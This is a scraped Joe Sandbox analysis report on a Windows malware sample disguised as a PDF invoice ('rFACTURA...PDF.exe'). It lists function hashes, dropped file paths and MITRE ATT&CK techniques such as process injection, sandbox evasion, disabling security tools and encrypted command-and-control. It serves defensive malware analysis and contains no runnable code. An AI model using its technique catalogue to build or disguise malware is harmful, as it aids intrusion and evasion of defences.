Opcode ID: 718517d00aaa82d0d89d36a3dccf3ddc20e3d8af9f208f9b75ababc267487fac
Instruction ID: d00f66c89435632d15780e5e5811f598f763fc31a68c709826a8ea9cfb7f06c1
Opcode Fuzzy Hash: 718517d00aaa82d0d89d36a3dccf3ddc20e3d8af9f208f9b75ababc267487fac
Instruction Fuzzy Hash: B3D01235D6022A978B04AAA5DC044EEFB38FE95221B504666D52437140EB70265986E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 34196300 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fe1a112479e8bee7b69e41464178595e98da2fa15e7e4812d57a7790fe18baf
Instruction ID: 7315027111085c9a25b2bff86ddb352a50555893858b632e75ce1858ae6b38a0
Opcode Fuzzy Hash: 3fe1a112479e8bee7b69e41464178595e98da2fa15e7e4812d57a7790fe18baf
Instruction Fuzzy Hash: DE528E74E01228CFEB64CF65C994BDDBBB2BB89301F1085EAD409A7254DB359E85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 34196933 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc7c313b0fd764009e8ed3b31e23209f97fb002d25c95de6798f3d1ff409371f
Instruction ID: 3c035fec72d73cd694da32d9fd14bbafb9f6d0bf03eaa3b7fba26d04e9387b3d
Opcode Fuzzy Hash: dc7c313b0fd764009e8ed3b31e23209f97fb002d25c95de6798f3d1ff409371f
Instruction Fuzzy Hash: 16A18B74A01228CFEB64DF65C894BDABBB2BB49301F5085EAD40DA7360DB719E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 34196B14 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb9fe12ed188ed48338fa360bba8d224a83ac3e79bcae3b61a4e9ff46697a1e
Instruction ID: 120bea52cd239704ca9e1c50fde2e4f7edbba34ac7f8bdbda3b4ef64841ac021
Opcode Fuzzy Hash: cdb9fe12ed188ed48338fa360bba8d224a83ac3e79bcae3b61a4e9ff46697a1e
Instruction Fuzzy Hash: 18519E74A11228CFDB64DF25C894B9ABBB2BB4A301F5085E9D40AB7360DB719E81CF54

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rFACTURA_FAC_2023_1-1000733.PDF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_caspol.exe_c9831a337d3627d9a81a22112d1a4918180c9e2_ea830a9b_d3bd527c-2f90-4458-9cd4-e1517201fb0e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B2E.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DBF.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DEF.tmp.xml

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Nikotins61.sto

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\System.Reflection.TypeExtensions.dll

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\System.Reflection.Primitives.dll

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\Talestrmmene.Unr

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\battery-level-90-charging-symbolic.svg

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\colorimeter-colorhug-symbolic.symbolic.png

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\media-playlist-consecutive-symbolic.svg

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\network-offline-symbolic.svg

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\network-wireless.png

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\preferences-desktop-font-symbolic.symbolic.png

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\task-due-symbolic.symbolic.png

Windows Analysis Report
rFACTURA_FAC_2023_1-1000733.PDF.exe

Function 00403350 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 412
stringfilecomCOMMON

Function 00405402 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 0040596D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 004065A2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Function 00403D1B Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 0040396D Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402EC1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Function 00406281 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre